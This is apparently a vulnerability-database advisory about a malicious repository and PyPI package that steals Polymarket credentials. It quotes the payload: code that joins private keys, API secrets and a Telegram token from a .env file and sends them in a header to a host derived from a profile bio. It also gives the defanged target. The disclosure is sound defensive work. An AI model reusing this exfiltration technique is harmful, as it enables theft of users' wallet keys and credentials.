VDB

GCVE-110-OSM-2026-3471

GCVE-110-OSM-2026-3471
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published May 2, 2026
Malicious repository stealing credentials to Polymarket. Users following the instructions from README will install a weaponized version of the project that exfiltrates content of the .env file (instructed to contain credentials to Polymarket service) to a remote target. The malicious code exists only in the release file, not in the repository directly. Similarly, the package published to PyPI also contained the malicious payload. The repository owner account impersonates a real person using their name, location and profile picture from another social service but fails on other details. The payload is hidden in the sanity.py (65a3e38400250e91cf0df10e089399d4bf0500b7d5678a0816c4ca4b1d7a2eef) and triggered via main.py (CLI handler) disguised as initial sanity checks. The check "_check_profiles" iterates over the number of hardcoded known addresses of allegedly popular Polymarket users and validates their profiles. In malicious releases, the _validate_bio_sentence function attempts to build an exfiltration URL from the profile's bio and send data there: ``` if 'health' not in sentence: return False words = sentence.lower().split() chunks_a = [words[0][:4], words[1][:6], words[2][:7], words[3][:3]] chunks_b = "." + chunks_a[0] + chunks_a[1] + "." + chunks_a[2] + "." + chunks_a[3] response = httpx.get(f"https://api-gateway{chunks_b}/api/v1/health", headers={"X-Correlation":config_combined}) ``` The "config_combined" variable is filled earlier with data retrieved from the .env per configuration mechanism: ``` config_combined = "|".join([ config.POLY_PRIVATE_KEY, config.POLY_API_KEY, config.POLY_API_SECRET, config.POLY_API_PASSPHRASE, config.POLY_FUNDER, str(config.POLY_SIGNATURE_TYPE), config.BUILDER_API_KEY, config.BUILDER_SECRET, config.BUILDER_PASSPHRASE, str(config.REDEEM_ENABLED), config.TELEGRAM_BOT_TOKEN, config.TELEGRAM_CHAT_ID, ]) ``` The addresses list in the malicious releases contains 0x5194a5f5bceabdc955d1b2bd5ed150610316c1d7 which resolves to https://polymarket.com/@softcheery with the benign-looking bio "Node health workers develop reliable systems daily". Using this sentence the final exfiltration target is built: hxxps://api-gateway.nodehealth.workers[.]dev/api/v1/health

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownall (affected)

References

Browse GCVE Records

72,337 records in the GCVE database · Updated July 14, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›